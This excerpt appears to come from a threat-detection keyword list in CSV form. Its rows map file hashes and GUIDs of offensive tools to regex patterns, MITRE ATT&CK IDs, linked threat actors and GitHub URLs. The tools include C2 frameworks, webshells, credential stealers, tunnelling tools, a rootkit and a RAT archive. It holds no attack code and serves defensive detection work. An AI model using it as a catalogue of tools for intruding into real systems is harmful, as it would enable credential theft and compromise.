T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","32492" "*a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62*",".{0,1000}a5034ebb8d6c31c71947c4f85a505f66fd1aadc71cecedd96f1bd02b3e471f62.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","32493" "*a507307a4b6e0f6f00e8a3f3330204c124fa5a69cfc03ffd89235c7e4b77f25d*",".{0,1000}a507307a4b6e0f6f00e8a3f3330204c124fa5a69cfc03ffd89235c7e4b77f25d.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/logangoins/Stifle","1","0","#filehash","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","32494" "*a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca*",".{0,1000}a50cefaf5e3c111224055a9e3e4d289c7c44dc0d8405bf96a52f8c6d254aaeca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32497" "*a50f337900d9adf19bfda21fa5d89c5b1525cbb96c1cddb9443e62d56f5a8e5b*",".{0,1000}a50f337900d9adf19bfda21fa5d89c5b1525cbb96c1cddb9443e62d56f5a8e5b.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","32498" "*a510e14853234b49b9053a18264aa29e4dfbf467edae47afe13a08d57d34dad4*",".{0,1000}a510e14853234b49b9053a18264aa29e4dfbf467edae47afe13a08d57d34dad4.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#filehash","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","32499" 
"*a512642f7af44ee8946f171b8921997ec271bf1c9f1e747067a6dc7b192d4ecd*",".{0,1000}a512642f7af44ee8946f171b8921997ec271bf1c9f1e747067a6dc7b192d4ecd.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32500" "*a516bc50f144f04756e380fcf24791cd1851a5d3856f6feb66e509ad0f087536*",".{0,1000}a516bc50f144f04756e380fcf24791cd1851a5d3856f6feb66e509ad0f087536.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32501" "*a516e0818b79c222bdc64dcc4f94733ec0678a1dd16a6502d2fc2c722142a5e5*",".{0,1000}a516e0818b79c222bdc64dcc4f94733ec0678a1dd16a6502d2fc2c722142a5e5.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","32502" "*A517A8DE-5834-411D-ABDA-2D0E1766539C*",".{0,1000}A517A8DE\-5834\-411D\-ABDA\-2D0E1766539C.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#GUIDproject","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32503" "*a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac*",".{0,1000}a52770362aceeca8d893ccb0fcfdf76991a94dc3e9cac0e595c897d1392dcaac.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32507" "*a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601*",".{0,1000}a5323adc6557587f17fc2766b95efbf76e5148dbc14b744cbf72b40bdc40f601.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32508" "*a53818852885cf956baa7b75e10a818ecef060c2c3ab1026d6f0cbbf2f47810e*",".{0,1000}a53818852885cf956baa7b75e10a818ecef060c2c3ab1026d6f0cbbf2f47810e.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","32509" "*a53c9d30294edfc74b34a79352c05882e23ddd37678ae419c083345bec6b4880*",".{0,1000}a53c9d30294edfc74b34a79352c05882e23ddd37678ae419c083345bec6b4880.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32511" "*a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9*",".{0,1000}a53d0d8ca3a89a4e43ea2993031c375499cc01810dc18c65097993c43cc03ea9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32512" "*a53e6802930fdf33441a3cf595c9b22e6800be07d72ace8b38a2f63f3fc806c1*",".{0,1000}a53e6802930fdf33441a3cf595c9b22e6800be07d72ace8b38a2f63f3fc806c1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32513" "*a548aefc374dfd65cf3a1970eec4bb96111c89f97716f3b30fb46909d24436b8*",".{0,1000}a548aefc374dfd65cf3a1970eec4bb96111c89f97716f3b30fb46909d24436b8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32514" "*a54ed10a2548f64bcf0a001636ab3578d277c3512cef54f0b0682d34266c8e6c*",".{0,1000}a54ed10a2548f64bcf0a001636ab3578d277c3512cef54f0b0682d34266c8e6c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32517" "*a550b029c646ac0752424ac16545bf084de1052b349ce5f47e2c24ce1227ff16*",".{0,1000}a550b029c646ac0752424ac16545bf084de1052b349ce5f47e2c24ce1227ff16.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32518" 
"*a5553553f4c9056cff908df93f4dd7f498a9ce180048d1331ed00028d644ea00*",".{0,1000}a5553553f4c9056cff908df93f4dd7f498a9ce180048d1331ed00028d644ea00.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32519" "*a556e82073a4932a5202e78699a2e9db62afd3e3d0b9361f915d3b92b9d821d9*",".{0,1000}a556e82073a4932a5202e78699a2e9db62afd3e3d0b9361f915d3b92b9d821d9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32520" "*a55f10e25a55f8d9d324cea77b455f4cbd711787a4ba874d2fd9255a30f39095*",".{0,1000}a55f10e25a55f8d9d324cea77b455f4cbd711787a4ba874d2fd9255a30f39095.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32523" "*a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239*",".{0,1000}a56757ad65727fec369f36a7c892618170bcdf89c22712d1c4010899c6ae9239.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32527" "*a568c8a8c28b7ceeee2f5eec82f94dd4fb0fc06175b2ee3043f863a68451ebbd*",".{0,1000}a568c8a8c28b7ceeee2f5eec82f94dd4fb0fc06175b2ee3043f863a68451ebbd.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","#filehash","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","32528" "*a56c6bd3f1997f0ed36f75f019637acc01749de3a31a7ffce345b31e8c02860a*",".{0,1000}a56c6bd3f1997f0ed36f75f019637acc01749de3a31a7ffce345b31e8c02860a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32529" "*a5737b1e8818b20b1f58e7bbcfd8ed2573dd4e3f81ad64fcd43666114878ce47*",".{0,1000}a5737b1e8818b20b1f58e7bbcfd8ed2573dd4e3f81ad64fcd43666114878ce47.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32532" "*a5789291ca04f1490a7b9478a9b8e1c37b594a59a101fd63d17a3eea11d04cd8*",".{0,1000}a5789291ca04f1490a7b9478a9b8e1c37b594a59a101fd63d17a3eea11d04cd8.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","32534" "*a5819c67d51cee328e38c7822c9a4a9fe76e715f4863bcac8fa0ed5bdf046c21*",".{0,1000}a5819c67d51cee328e38c7822c9a4a9fe76e715f4863bcac8fa0ed5bdf046c21.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32536" "*a583acecdb43cd9b4806eddcf0582ec0cfd9281a2ff821b3d35c4d2dd6103eeb*",".{0,1000}a583acecdb43cd9b4806eddcf0582ec0cfd9281a2ff821b3d35c4d2dd6103eeb.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 
TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32539" "*a585d145f761ab45a617d83aecb895a363f95f5e282f549716f8397cb8006cb5*",".{0,1000}a585d145f761ab45a617d83aecb895a363f95f5e282f549716f8397cb8006cb5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32541" "*a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455*",".{0,1000}a585eb434239e5c1714192482f20ec2483bf8eae4654ef77973524b3a151b455.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","32542" "*a58a13faa35a214b12f57674937f8ebf27eb62e29e26b7a00a624cc127197b50*",".{0,1000}a58a13faa35a214b12f57674937f8ebf27eb62e29e26b7a00a624cc127197b50.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","32543" "*a58d7f84b2c5eb57cdf19378b21cbda2a1fbe135da57f0f6fc910813ed56a421*",".{0,1000}a58d7f84b2c5eb57cdf19378b21cbda2a1fbe135da57f0f6fc910813ed56a421.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32545" "*a58ef464df86f0f3dfab3123cae2fbfd6cb86b707f9dfa4a281ea0e9a40a858d*",".{0,1000}a58ef464df86f0f3dfab3123cae2fbfd6cb86b707f9dfa4a281ea0e9a40a858d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32546" "*a58fa5635efa5a680c1861aca8a2e630b4031dadb901fe36df5e1f7018948275*",".{0,1000}a58fa5635efa5a680c1861aca8a2e630b4031dadb901fe36df5e1f7018948275.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 
- T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","32547" "*a58fd21735ae4781c5aa58714ac26575ae954aea83ca2bd501439f3c0416a1fd*",".{0,1000}a58fd21735ae4781c5aa58714ac26575ae954aea83ca2bd501439f3c0416a1fd.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32548" "*a591699874d0a2c26c1d9e47561ee2a3043fc3ea458c09a7ab8a24a25150cd0a*",".{0,1000}a591699874d0a2c26c1d9e47561ee2a3043fc3ea458c09a7ab8a24a25150cd0a.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential 
Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","32549" "*a59b7561dd5d4715889191c2940059098a322528379a1d66dd1a960ffa87a601*",".{0,1000}a59b7561dd5d4715889191c2940059098a322528379a1d66dd1a960ffa87a601.{0,1000}","offensive_tool_keyword","PoolPartyBof","A beacon object file implementation of PoolParty Process Injection Technique","T1055.011 - T1055 - T1620","TA0005","N/A","Black Basta","Privilege Escalation","https://github.com/0xEr3bus/PoolPartyBof","1","0","#filehash","N/A","10","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","32551" "*a59fce8872204dfb9885c0b1df12dd0da813aeb281699bf785783265fe27c415*",".{0,1000}a59fce8872204dfb9885c0b1df12dd0da813aeb281699bf785783265fe27c415.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","32552" "*a5a57a006b98eb951be3ac97064f7410f29c2b3a2bcd815baba49173db2d4b76*",".{0,1000}a5a57a006b98eb951be3ac97064f7410f29c2b3a2bcd815baba49173db2d4b76.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32553" "*a5ab019bded982769759606c4e2120bd87f1df5f399baedb739268610df58541*",".{0,1000}a5ab019bded982769759606c4e2120bd87f1df5f399baedb739268610df58541.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 
- T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32554" "*A5B912EC-D588-401C-A84F-D01F98142B9E*",".{0,1000}A5B912EC\-D588\-401C\-A84F\-D01F98142B9E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32555" "*a5b9dc00d9009b755eea768d19d401d268a2ef7a7fa9dc7bc6183064a2d8f40a*",".{0,1000}a5b9dc00d9009b755eea768d19d401d268a2ef7a7fa9dc7bc6183064a2d8f40a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32556" "*a5bd5b4800c559bdecc3cc32c76fe128e7e10f008a1224d9f6acfd06015b52a3*",".{0,1000}a5bd5b4800c559bdecc3cc32c76fe128e7e10f008a1224d9f6acfd06015b52a3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32557" 
"*a5c8d558af0e8e3853cdd03be91dc7d915113a291466383005dbe1951809f663*",".{0,1000}a5c8d558af0e8e3853cdd03be91dc7d915113a291466383005dbe1951809f663.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#filehash","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","32559" "*a5cbbccf1b4a7493f36eb7b51beb19c77a8ac044a4edfb2a5f13d6a00601eb29*",".{0,1000}a5cbbccf1b4a7493f36eb7b51beb19c77a8ac044a4edfb2a5f13d6a00601eb29.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32560" "*a5d3197567e9952913d0f76422b9a83c9b90f71dabdc8e22eb7dfdcf435ed69a*",".{0,1000}a5d3197567e9952913d0f76422b9a83c9b90f71dabdc8e22eb7dfdcf435ed69a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32562" "*a5d8564157388d8d628ba9b8785307fd8cbbf3b6fafc1cd46160712a0015ced6*",".{0,1000}a5d8564157388d8d628ba9b8785307fd8cbbf3b6fafc1cd46160712a0015ced6.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#filehash","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","32563" 
